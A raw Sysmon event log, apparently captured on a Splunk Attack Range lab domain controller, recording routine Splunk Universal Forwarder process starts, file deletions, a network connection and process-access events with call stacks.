23542300x80000000000000002201460Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:00.089{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28A1B5CB16477CC00A981B070E8E3A16,SHA256=A8A72648FDECAE539B53CB419409013635A9C08D6C40F48A3A1AC27F8068E1A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201463Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:56.909{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55219-false10.0.1.12-8000- 23542300x80000000000000002201462Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:01.104{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB533424AEF46B316B79A103BAA80291,SHA256=1806E6A4B6EDD5731731039EA96DAE99CB69F56A59B03CCA87CBE00E90B44DC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201480Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.886{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7A6-6040-034E-00000000AD01}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201479Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.886{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201478Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.886{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201477Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.886{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201476Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.886{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201475Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.886{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E7A6-6040-034E-00000000AD01}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201474Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.886{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7A6-6040-034E-00000000AD01}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201473Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.886{5ABCFE62-E7A6-6040-034E-00000000AD01}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002201472Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.214{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7A6-6040-024E-00000000AD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201471Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.214{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201470Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.214{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201469Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.214{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201468Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.214{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201467Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.214{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E7A6-6040-024E-00000000AD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201466Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.214{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7A6-6040-024E-00000000AD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201465Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.215{5ABCFE62-E7A6-6040-024E-00000000AD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201464Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:02.136{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C3F00B2A7E52D418B7F194AB5B559F0,SHA256=28FEC92D5F1233D56188AAA4DEBD34653FB0F240EE6BB75A918B37A090A106C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201492Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.620{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-8423-603E-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002201491Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.526{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7A7-6040-044E-00000000AD01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201490Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.526{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201489Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.526{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201488Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.526{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201487Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.526{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201486Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.526{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E7A7-6040-044E-00000000AD01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201485Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.526{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7A7-6040-044E-00000000AD01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201484Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.527{5ABCFE62-E7A7-6040-044E-00000000AD01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201483Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:03.214{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED02CCEBDD3E4CC00B3E7C7E4245E526,SHA256=758F6AC8EADAEB31AB90D90C20D070F16D90FF9774AA22FF50A39BA1D6BAFBCD,IMPHASH=00000000000000000000000000000000falsetrue 